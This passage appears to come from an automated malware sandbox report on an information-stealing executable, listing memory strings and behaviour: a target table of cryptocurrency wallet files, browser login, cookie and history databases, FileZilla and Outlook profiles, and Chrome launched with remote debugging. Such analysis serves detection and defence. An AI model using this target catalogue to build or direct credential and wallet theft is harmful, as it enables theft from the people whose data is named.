Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Source: Yara match File source: 00000000.00000002.2467001379.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2466300957.00000000007C4000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: h4ZgewNxoj.exe PID: 3376, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: Yara match File source: 00000000.00000002.2466300957.00000000006F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2467001379.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2074987962.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: h4ZgewNxoj.exe PID: 3376, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: h4ZgewNxoj.exe PID: 3376, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs